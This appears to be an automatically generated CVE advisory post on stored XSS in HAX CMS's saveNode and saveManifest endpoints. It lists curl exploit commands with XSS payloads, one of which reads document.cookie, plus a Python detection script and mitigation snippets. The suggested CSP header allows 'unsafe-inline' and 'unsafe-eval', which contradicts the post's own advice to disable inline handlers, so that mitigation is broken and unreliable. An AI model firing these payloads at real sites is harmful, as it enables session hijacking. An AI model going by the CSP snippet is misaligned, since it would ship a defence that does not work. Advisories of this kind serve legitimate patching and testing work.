Listen to this Post
How the CVE Works
The vulnerability arises due to insufficient input sanitization in HAX CMS’s `saveNode` and `saveManifest` endpoints. These endpoints accept user-supplied data and store it within the site’s JSON schema without proper validation. When the stored content is rendered, malicious JavaScript embedded in HTML tags (excluding <script>) executes in the victim’s browser. Attackers exploit this by injecting payloads via the site editor’s “View Source” or the settings editor’s URL field. Since the application fails to escape event handlers (e.g., onerror, onload) or other XSS vectors, authenticated attackers can hijack sessions or exfiltrate sensitive data.
DailyCVE Form
Platform: HAX CMS
Version: <1.12.0
Vulnerability: Stored XSS
Severity: Critical
Date: 2023-10-15
Prediction: Patch by 2023-11-20
What Undercode Say:
Analytics
- Attack Vector: Authenticated user abuse
- Exploitability: Low complexity
- CVSS Score: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
Exploit Commands
1. saveNode XSS:
curl -X POST 'https://<site>/<user>/system/api/saveNode' -d '{"html":"<img src=x onerror=alert(document.cookie)>"}'
2. saveManifest XSS:
curl -X POST 'https://<site>/<user>/system/api/saveManifest' -d '{"theme":{"url":"javascript:alert(1)"}}'
Mitigation Code
1. Input Sanitization (Node.js):
const sanitizeHtml = require('sanitize-html');
const clean = sanitizeHtml(userInput, { allowedTags: [], allowedAttributes: {} });
2. CSP Header:
add_header Content-Security-Policy "default-src 'self'; script-src 'unsafe-inline' 'unsafe-eval'";
Detection Script
import requests
def check_xss(url):
payload = "<svg/onload=confirm(1)>"
r = requests.post(url, json={"html": payload})
return payload in r.text
Remediation Steps
1. Upgrade to HAX CMS >=1.12.0.
2. Disable inline event handlers via CSP.
3. Audit user-generated content for `on` attributes.
References
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
